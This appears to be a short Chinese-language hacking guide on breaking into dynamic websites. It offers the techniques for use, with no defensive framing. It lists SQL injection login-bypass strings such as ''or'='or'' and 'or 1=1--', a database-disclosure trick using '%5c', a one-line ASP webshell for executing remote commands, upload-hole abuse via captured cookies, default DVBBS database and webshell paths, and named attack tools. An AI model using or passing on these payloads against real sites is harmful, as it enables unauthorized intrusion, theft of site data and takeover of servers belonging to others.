入侵指定網站是需要條件的:
要先觀察這個網站是動態還是靜態的。
如果是靜態的(.htm或html),壹般是不會成功的。
如果要入侵的目標網站是動態的,就可以利用動態網站的漏洞進行入侵。
Quote:以下是入侵網站常用方法:
1.上傳漏洞如果看到:選擇妳要上傳的文件 [重新上傳]或者出現“請登陸後使用”,80%就有漏洞了!
有時上傳不壹定會成功,這是因為Cookies不壹樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.註入漏洞字符過濾不嚴造成的
3.暴庫:把二級目錄中間的/換成%5c
4.’or’=’or’這是壹個可以連接SQL的語名句.可以直接進入後臺。我收集了壹下。類似的還有:
’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a
5.社會工程學。這個我們都知道吧。就是猜解。
6.寫入ASP格式數據庫。就是壹句話木馬〈%execute request("value")%〉 (數據庫必需得是ASP或ASA的後綴)
比如:默認數據庫,默認後臺地址,默認管理員帳號密碼等
8.默認數據庫/webshell路徑利用:這樣的網站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp/diy.asp/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
工具:網站獵手 挖掘雞 明小子